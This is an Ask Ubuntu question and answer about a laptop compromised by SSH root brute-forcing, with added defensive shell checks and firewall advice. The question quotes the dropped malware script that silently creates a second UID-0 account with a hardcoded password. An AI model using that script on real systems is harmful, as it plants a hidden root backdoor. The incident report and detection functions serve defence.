Ubuntu – How to deal with malware on the laptop

Tags: malware, security

I am fairly certain that my Ubuntu 13.10 laptop is infected with some sort of malware.

Every once in a while, I find a process /lib/sshd (owned by root) running and consuming lots of cpu. It is not the sshd server which runs /usr/sbin/sshd.

The binary has –wxrw-rwt permissions and it generates and spawns scripts in the /lib directory. A recent one is named 13959730401387633604 and it does the following:

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

The gusr user was created by the malware independently, and then the chpasswd hangs while consuming 100% cpu.

So far, I've identified that the gusr user was additionally added to files in /etc/

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

It seems like the malware made copies of all these files with the "-" suffix. The full list of /etc/ files that were modified by root is available here.

In addition, the /etc/hosts file was changed to this.

The /lib/sshd starts by adding itself to the end of /etc/init.d/rc.local file!

I've removed the user, removed the files, killed the tree of processes, changed my passwords and removed the ssh public keys.

I am aware that I am basically screwed, and I will most likely reinstall the whole system. Nevertheless, since I login to several other machines, it would be good to at least attempt to remove it, and figure out how I got it. Any suggestions on how to go about this would be appreciated.

It seems like they got in on March 25 by brute-forcing root login. I had no idea that root ssh is enabled by default in Ubuntu. I disabled it and put up denyhosts.

The login was from 59.188.247.236, somewhere in Hong Kong apparently.

I got the laptop from EmperorLinux, and they enabled root access. If you have one of those and you're running sshd beware.
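Checks for the three indicators the question describes (a second UID-0 account, an init script line pointing at a file directly in /lib, and the line a shadow-utils tool added since writing its "-" backup), added here as an example and not part of the original post. It creates constructed sample files so it runs offline; on a real host you would pass /etc/passwd and /etc/init.d/rc.local instead.

```shell
#!/bin/sh
# Added example (not from the original post): host checks for the
# indicators described in the question.

# Accounts with UID 0 other than root.
# Usage: extra_uid0_accounts /etc/passwd
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Non-comment lines that reference a file sitting directly in /lib
# (libraries live there; executables such as /lib/sshd normally do not).
# Paths in /lib subdirectories, e.g. /lib/lsb/init-functions, are ignored.
# Usage: suspicious_rc_lines /etc/init.d/rc.local
suspicious_rc_lines() {
    grep -Ev '^[[:space:]]*(#|$)' "$1" |
        grep -E '(^|[[:space:]])/lib/[^/[:space:]]+([[:space:]]|$)' || true
}

# Lines in FILE that are absent from FILE- . useradd/chpasswd copy the old
# file to FILE- before rewriting it, so this isolates the most recent change
# (the "-" files are tool backups, not copies made by the malware).
# Usage: added_since_backup /etc/passwd
added_since_backup() {
    grep -vxFf "$1-" "$1" || true
}

# Constructed sample data so the checks can be tried offline; prints the
# directory it created. Remove it afterwards with rm -rf.
make_sample_dir() {
    d=$(mktemp -d)
    printf '%s\n' 'root:x:0:0:root:/root:/bin/bash' \
        'alice:x:1000:1000::/home/alice:/bin/bash' > "$d/passwd-"
    cp "$d/passwd-" "$d/passwd"
    printf '%s\n' 'gusr:x:0:0::/home/gusr:/bin/sh' >> "$d/passwd"
    printf '%s\n' '#!/bin/sh' '# constructed rc.local sample' \
        '. /lib/lsb/init-functions' '/lib/sshd' > "$d/rc.local"
    echo "$d"
}
```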

Best Answer

First, get that machine off the network now!

Second, why did you have the root account enabled? You really shouldn't enable the root account unless you have a very good reason to do so.

Thirdly, yes, the only way to be sure you're clean is to do a clean install. It's also advised that you start fresh and don't go back to a backup, as you can never be sure when it all started.

I also suggest that you set up a firewall in your next install and deny all incoming connections:

sudo ufw default deny incoming

and then allow ssh with:

sudo ufw allow ssh

and DON'T enable the root account! Certainly make sure that root ssh login is disabled.
